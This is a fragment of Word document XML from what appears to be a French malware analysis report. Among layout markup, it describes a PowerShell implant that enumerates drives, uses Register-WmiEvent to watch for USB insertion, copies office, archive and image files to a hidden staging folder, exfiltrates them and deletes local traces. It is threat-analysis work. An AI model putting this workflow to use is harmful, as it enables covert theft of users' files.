                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="10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"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> WMI</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="12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spécifique</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="14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72"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> :</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="24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Get-CimInstance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0384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1191483</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4961100" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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110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Win32_LogicalDisk -Filter "DeviceID='[Lettre du lecteur]:'"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140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1508348</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5565023" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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11"/>
                          </w:rPr>
                          <w:t xml:space="preserve">3.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En fonction de l'entier renvoyé par la propriété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DriveType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, le code adapte sa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243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1723613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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46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logique. Si la valeur de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DriveType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est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2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(pour USB), l’exécution est redirigée vers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345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1920263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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une fonction dédiée de préparation des données USB plutôt que vers sa propre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448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2093618</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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fonction d’exfiltration (décrite plus loin d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ans la section cons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acrée à la surveillance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550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2285588</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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46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clés USB). Pour les disques fixes (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">DriveType = 3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) ou les lecteurs réseau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6528" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1416049</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2500853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5320548" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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054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DriveType = 4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), le script effectue une vérification de cohérence en comparant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755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2502558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="82521" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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857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2716118</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4394680" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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468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racine du lecteur à la variable d’environnement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$env:userprofile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3032983</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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Si le lecteur correspond à la partition système (généralement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), l’analyse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062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3229633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5336358" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="23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63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interrompue afin d’éviter tout chevauchement avec le premier mécanisme décrit ci-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164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3402988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5385318" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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dessus. En revanche, si le lecteur est ide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ntifié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comme un volume de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do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nnées distinct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267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3594958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5384683" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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46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(tel qu’un lecteur de données secondaire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D:\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ou un partage réseau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Z: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), son chemin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369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3791608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4327141" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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71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d’accès racine est immédiatement transmis à la fonction d’exfiltration.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4720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4061485</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2556152" cy="189848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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6152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4.4.4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Surveillance des clés USB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5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4373903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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L'orchestrateur met en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place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listener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pour le stockage USB. Le code utilise la fonction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676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4565873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817753" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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Register-WmiEvent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pour s'abonner à toutes les notifications d'événements concernant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7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4762523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="865934" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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593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clés USB.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8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5055217</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734284" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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28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Register-WmiEvent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Query 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"select * from __InstanceCreationEvent within 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5210157</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817704" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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0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where TargetInstance ISA 'Win32_LogicalDisk' and TargetInstance.DriveType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0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5365097</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5266740" cy="154967"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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6740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= 2"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Action </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle62"/>
                            <w:spacing w:val="-7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">$cjObc0rpxzoo55zghAOT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SourceIdentifier USBFlashDrive;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1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5540398</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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Il lance un processus Powershell caché qui récupère et exécute une fonction à partir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2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5713753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="578850" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8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registre.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3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5988708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Dès qu’une clé USB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externe est détectée, la fonction parcourt une liste d’extensions cibles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4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6180678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5878575" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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5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codées en dur : </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="3"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">*.doc, *.docx, *.dot, *.xls, *.xlsx, *.ppt, *.pptx,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598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6395943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5860160" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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01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*.pps, *.xps, *.wpd, *.wll, *.psd, *.ai, *.vsd, *.rtf, *.odt, *.ods,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700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6611208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5860160" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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01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*.odp, *.txt, *.pdf, *.md, *.csv, *.rar, *.zip, *.7z, *.mdb, *.jpg,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803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6826473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1199895" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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989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*.jpeg, *.tmp</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle64"/>
                            <w:spacing w:val="-7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69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7127898</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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Pour chaque fichier correspondant, la fonction lance une réplication. Plutôt que de procéder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7301253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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à l’exfiltration directement depuis le support externe, la fonction</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="15"/>
                            <w:u w:val="single" w:color="000000"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> crée un répertoire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1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7493223</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5879210" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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92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intermédiaire caché sur le disque système de l’hôte, accessible via </w:t>
                        </w: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$env:userprofile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2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7708488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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(ou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$env:programdata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à défaut). Ce répertoire se trouve dans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%UserProfile%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(ou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315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7923753</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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%ProgramData%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) et est nommé à partir des 15 premiers caractères du GUID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4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8139018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5834898" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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machine, récupéré dans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HKLM\SOFTWARE\Microsoft\Cryptography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. Le répertoire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5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8354283</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5797433" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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74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explicitement</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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masqué</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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à</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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l’aide</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="13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9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commande</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="33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34"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">attrib +h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6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8550933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fois les fichiers copiés avec succès dans ce dossier de transit caché, la fonction lance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7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8724288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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fonction d’exfiltration. Cette fonction parcourt le dossier de transit et exfiltre chaque fichier. Si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8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8897643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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3"/>
                          </w:rPr>
                          <w:t xml:space="preserve">l’ex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filtration aboutit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, la copie locale du fichier dans le dossier de transit est supprimée à l’aide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9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9091318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="229880" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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8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0" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1113154</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9089613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="993023" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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30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Remove-Item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134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236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33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441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544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286464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1919614</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="193039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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193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19303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93039"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="19303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2608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3380114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1250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1250950">
                          <a:moveTo>
                            <a:pt x="0" y="936625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="936625"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1250950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1250950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="936625"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="789940"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="937260"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="937260"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="789940"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="642620"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="642620"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="495299"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="495299"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="200659"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="200659"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="200659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200659"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2006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3632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1919614</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="193039"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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193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193039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193039"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="19303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9776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3380114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="1250950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1250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1250950">
                          <a:moveTo>
                            <a:pt x="0" y="936625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="936625"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5875019" y="1250950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1250950"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="936625"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="789940"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="937260"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="937260"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="789940"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="642620"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="789940"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="642620"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="495299"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="642620"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="495299"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="57149" y="200659"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="200659"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5817869" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="495299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57149" y="200659"/>
                          </a:lnTo>
                          <a:close/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200659"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2006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3088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1920249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="192405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1924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192405">
                          <a:moveTo>
                            <a:pt x="3174" y="19240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19240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5136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3380749</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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0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0025">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="20002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6160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3380749</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="200025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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0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0025">
                          <a:moveTo>
                            <a:pt x="0" y="200025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7184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3580774</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="294639"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="24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946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94639">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="29463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8208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3580774</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="294639"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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946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94639">
                          <a:moveTo>
                            <a:pt x="0" y="29463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9232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3875414</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="14732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0256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3875414</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20">
                          <a:moveTo>
                            <a:pt x="0" y="1473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0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4022734</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="14732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2304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4022734</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20">
                          <a:moveTo>
                            <a:pt x="0" y="1473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3328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4170054</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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20">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="14732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4352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4170054</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="147320"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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7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7320">
                          <a:moveTo>
                            <a:pt x="0" y="14732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5376" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6714490</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4317374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="313689"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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13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13689">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="31368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7424" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>846454</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4317374</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="313689"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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13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13689">
                          <a:moveTo>
                            <a:pt x="0" y="3136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0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1920249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="192405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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1924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192405">
                          <a:moveTo>
                            <a:pt x="3174" y="192405"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="189230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="189230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="189230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="189230"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="19240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5856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3380749</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="1250315"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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12503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1250315">
                          <a:moveTo>
                            <a:pt x="3174" y="1250315"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="936625"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="1247140"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1247140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="1247140"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="1247140"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="936625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="1250315"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="936625"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="789305"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="789305"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="936625"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="789305"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="641985"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="641985"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="789305"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="641985"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="494664"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="494664"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="641985"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="494664"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="200025"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="200025"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="494664"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="20002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20002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7904" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5918835</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2720349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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9952" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3673474</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2720349</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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8144" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2173604</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5082549</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2573023" cy="588010"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="2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3023" cy="588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73019" h="588010">
                          <a:moveTo>
                            <a:pt x="0" y="588010"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="388620"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="2573019" y="388620"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2573019" y="588010"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="1010920" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
